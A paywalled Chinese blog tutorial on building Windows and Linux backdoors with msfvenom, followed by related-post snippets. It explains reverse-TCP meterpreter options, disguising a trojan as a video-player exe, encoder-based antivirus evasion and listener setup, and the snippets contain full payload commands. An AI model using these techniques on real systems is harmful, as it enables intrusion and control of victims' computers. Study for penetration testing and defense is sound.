网络安全:制作 windows 和 linux 客户端恶意软件进行渗透

原创 已于 2022-04-23 18:06:12 修改 · 5.6k 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #系统安全 #web安全

于 2022-04-21 21:30:02 首次发布
本文详细介绍了如何制作Windows和Linux的恶意软件以获取shell,包括使用msfvenom生成Windows的exe后门,WinRAR捆绑自解压程序,Linux ELF文件制作,以及创建带有后门的deb软件包。通过实战步骤展示了如何避开杀毒软件检测,成功获取目标系统控制权。
  1. 实战-制作 Windows 恶意软件获取公司财务电脑 shell
  2. 实战- WinRAR 捆绑恶意程序并自动上线 MSF
  3. 实战-制作 Linux 恶意软件获取公司服务器 shell
  4. 实战-制作恶意 deb 软件包来触发后门

1.制作 Windows 恶意软件获取 shell

msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机上执行,在本地监听上线

在这里插入图片描述

生成西瓜影音.exe 后门程序
使用一个编码器

在这里插入图片描述

使用两个编码器
在这里插入图片描述

参数说明
-a 指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位。 32 位软件可以在 64 位系统上运行。所以我们生成 32 位的后门,这样在 32 位和 64 位系统中都可以使用。
–platform 指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台
-p 设置攻击载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷
LHOST 目标主机执行程序后连接我们 Kali 的地址
LPORT 目标主机执行程序后连接我们 Kali 的端口
-b 去掉坏字符,坏字符会影响 payload 正常执行。
扩展:\x00 代表 16 进制的“00”组成的字符串。通过 ASCII 码换成能识别的就是:“00” -“00000000” - NUL。由于"00000000"是不可见字符,所以代码中没用。如图

在这里插入图片描述-e 指定编码器,也就是所谓的免杀,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -lencoders 查看所有编码器
-i 指定 payload 有效载荷编码迭代次数。 指定编码加密次数,为了让杀毒软件,更难查出源代码
-f 指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -lformats 查看所有支持的格式
-o 指定文件名称和导出位置。 指定到网站根目录/var/www/html,方便在肉机上下载后门程序

在 MSF 上启动 handler 开始监听后门程序
在这里插入图片描述

在这里插入图片描述

打开 win7 访问 Kali 搭建的 Web 服务下载执行文件

在这里插入图片描述

使用 virustotal 检测下生成后门的免杀能力,VirusTotal.com 是一个免费的病毒,蠕虫,木马和各种恶意软件分析服务,可以针对可疑文件和网址进行快速检测,最初由 Hispasec 维护。它与传统杀毒软件的不同之处是它通过多种杀毒引擎扫描文件。使用多种反病毒引擎可以令用户们通过各杀毒引擎的侦测结果,判断上传的文件是否为恶意软件。
打开:https://www.v

最低0.47元/天 解锁文章
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2959
通过制作含病毒木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
《黑客之道》—网络安全制作windowslinux客户端恶意软件进行渗透
xueshenlaila的博客
11-11 2563
渗透测试-----制作WindowsLinux客户端恶意软件进行渗透(一)
qq_63831588的博客
06-15 644
在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发 检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并不能解决所有问题,我们需要利用免杀来躲避安全软件的查杀。
制作windowslinux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3741
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
制作WindowsLinux客户端恶意软件进行渗透
2301_81916575的博客
12-17 1037
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/西瓜影音。一会弹出的这个窗口,点运行就可以了。
20、保障网络安全:NetWare系统与恶意软件防护
最新发布
yy01234的博客
07-29 48
本文详细探讨了保障NetWare系统安全的基础操作与最佳实践,包括防范未经授权的登录、明文数据包的应对措施、降低安全风险的配置方法等。同时,全面解析了恶意软件的类型、影响及防范建议,并结合实际案例分析了恶意软件攻击的过程。最后,提供了恶意软件检测与清除的完整流程,旨在帮助用户提升网络安全水平,保护信息资产安全
制作windows客户端恶意软件进行渗透
m0_56988395的博客
02-20 1118
目录 工具 靶机 客户端渗透原理 制作Windows恶意软件获取shell 工具 Metasploit 靶机 windows 2008 r2 相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段 注:以下内容仅供学习交流,请勿用于非法用途 客户端渗透原理 在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害
1. 制作Windows恶意软件
jazzz98的博客
10-09 757
当然也可以直接加到主程序上,但是加主程序上,有时报错。下载的文件在/var/cache/apt/archives下,移动到根目录,dpkg解压。靶机访问链接下载文件http://192.168.142.135/西瓜影音.exe,执行。启动exploit/multi/handler监听模块,设置好端口,run开始监听。创建 deb 软件包,安装后脚本文件,来加载后门。当靶机运行后门程序,反弹成功,恶意软件成功连接。打开靶机,下载后门文件,添加执行权限并执行。msf启动handler监听后门程序,
Kali实现msfvenom在WindowsLinux靶机下后门漏洞
weixin_43287317的博客
03-28 6232
Kali实现msfvenom在WindowsLinux靶机下后门漏洞
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1280
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
【防火墙_挂载防病毒策略】
yuxue_cn的博客
09-26 310
防火墙挂载防病毒模块配置方法,可举一反三,其他牌子防火墙UTM配置方法类似
如何做一个流氓软件-Android系统按钮的控制
Rindia的博客
09-21 1209
最近做一个项目要需要软件,不能随便被用户关掉,所以就一直研究如实现这种效果。主要实现的功能是,关掉虚拟按钮,关掉返回键,Home,menu键,电源键,下拉顶部栏。主要就是这几个。 返回键:返回键音量键最简单,只要在Activity中重写onkeydown方法就好了。 @Override public boolean onKeyDown(int keyCode, KeyEv
python怎么编写流氓软件_Python恶意软件分析入门
weixin_39953102的博客
12-05 426
介绍提升你的 Python 编程技巧可能正在你的待做清单上——就行清理衣橱、粉刷墙壁、拧紧螺丝一样(你知道我在说什么)。通常来说,脚本是跨大多数安全学科的一个实用的工具,编写脚本可以帮助你自动完成琐碎的任务,规模化分析大量数据,分担你的工作量。尽管有许多的编程语言可供选择,但 Python 是其中最受欢迎的那一个,抛开别的原因不谈,它是跨平台的,并且相对容易阅读编写。许多现有的开源安全工具都是用...
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
网络安全工程师教你:如何进行WindowsLinux操作系统的渗透
08-17
一、课程目标:掌握WindowsLinux操作系统的渗透攻防技巧二、课程简介:1、Kali Linux是基于Debian的Linux发行版操作系统,一开始是由Offensive Security的Mati AharoniDevon Kearns通过重写BackTrack来完成,用来进行数字取证。2、Kali Linux拥有超过300个渗透测试工具,拥有开源Git树等,甚至还集成了600多种黑客工具,完全可以想象到它的强大性。此外大家还可以免费使用Kali操作系统。3、Kali Linux可以进行WindowsLinux操作系统的渗透攻防等一系列应用场景。三、常见问题:问:英语数学基础一般,能学会吗?答:这门课程专为小白设计,英语数学基础一般没有关系,老师会一步步带领大家从基础学起,由浅入深,您可放心学习,预祝您学习愉快!
网络安全笔记-MSF
L120305q的博客
08-21 2875
网络安全笔记-MSF
安全防御之反病毒网关
weixin_67259816的博客
03-28 869
该篇文章主要是对防病毒网关的总结,其中涉及到恶意软件的概念,分类;反病毒技术,反病毒网关的工作过程以及配置流程。
入侵检测——恶意软件、病毒、防病毒、反病毒技术
qq_68163788的博客
07-29 2639
病毒感染系统后,无疑会对系统作出各种修改破坏。有时候病毒会使受感染的系统自己弹出网页、占用高CPU资源,自动弹出/关闭窗口、自动终止某些进程等各种不正常的现象(1)下载特征很多木马、后门程序间谍软件会自动连接到Internet某Web站点,下载其他的病毒文件或该病毒自身的更新版本/其他变种。(2)后门特征后门程序及很多木马、蠕虫间谍软件会在受感染的系统中开启 并侦听某个端口,允许远程恶意用户来对该系统进行远程操控;反病毒技术是指用于防止、检测清除计算机病毒的技术。随着计算机病毒的不断演变传播
信安软考 第十四章 恶意代码防范技术原理
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
10-13 3070
恶意代码(Malicious code),是一种违背目标系统安全策略的程序代码,会造成目标系统信息泄露、资源滥用,破坏系统的完整性及可用性。它能够经过存储介质或网络进行传播,从一台计算机系统传到另一外一台计算机系统,未经授权认证访问或破坏计算机系统。通常许多人认为“病毒”代表了所有感染计算机并造成破坏的程序,但实际上,换成“恶意代码”更为贴切,病毒只是恶意代码的一种。恶意代码的种类包括。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

White boy&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值